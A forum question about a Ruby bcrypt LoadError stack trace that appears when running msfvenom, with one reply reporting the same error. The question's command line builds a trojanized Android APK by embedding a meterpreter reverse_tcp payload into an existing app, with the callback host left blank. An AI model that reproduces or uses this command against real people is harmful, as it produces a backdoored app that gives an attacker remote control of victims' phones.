# Problem with msfvenom command

Tags: metasploit

I came across this problem while typing the command

```
msfvenom -x "file.apk" -p android/meterpreter/reverse_tcp LHOST ="" LPORT ="" -o "newfile.apk""
```

Does anyone know something about that?
I get the following error:

> Traceback (most recent call last):    21: from
>   /usr/local/bin/msfvenom:441:in `<main>'   20: from
>   /usr/local/bin/msfvenom:55:in`framework'     19: from
>   /usr/local/bin/msfvenom:36:in `init_framework'    18: from
>   /usr/local/bin/msfvenom:18:in`require_deps'  17: from
>   /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in
>   `require'     16: from
>   /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in`
>   require'     15: from /opt/metasploit-framework/lib/msfenv.rb:18:in
>   `<top (required)>'    14: from
>   /opt/metasploit-framework/lib/msfenv.rb:18:in`require'   13: from
>   /opt/metasploit-framework/config/environment.rb:2:in `<top
>   (required)>'  12: from
>   /opt/metasploit-framework/config/environment.rb:2:in`require'    11:
>   from /opt/metasploit-framework/config/application.rb:10:in `<top
>   (required)>'  10: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bundler-1.17.1/lib/bundler.rb:114:in`
>   require'      9: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bundler-1.17.1/lib/bundler/runtime.rb:65:in
>   `require'      8: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bundler-1.17.1/lib/bundler/runtime.rb:65:in`
>   each'     7: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bundler-1.17.1/lib/bundler/runtime.rb:72:in
>   `block in require'     6: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bundler-1.17.1/lib/bundler/runtime.rb:95:in`
>   rescue in block in require'   5: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bundler-1.17.1/lib/bundler/runtime.rb:95:in
>   `require'      4: from
>   /opt/metasploit-framework/lib/metasploit/framework.rb:9:in`'   3: from
>   /opt/metasploit-framework/lib/metasploit/framework.rb:9:in `require'
>
>   2: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bcrypt-3.1.12/lib/bcrypt.rb:12:in`
>   '     1: from
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bcrypt-3.1.12/lib/bcrypt.rb:16:in
>   `rescue in <top (required)>'
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bcrypt-3.1.12/lib/bcrypt.rb:16:in`
>   require': incompatible library version -
>   /home/ubuntu/.rvm/gems/ruby-2.5.1@metasploit-framework/gems/bcrypt-3.1.12/lib/bcrypt_ext.so
>   (LoadError)

Comment: I get this too on Debian 9.  :-/  I executed a simple `mfsvenum -l`.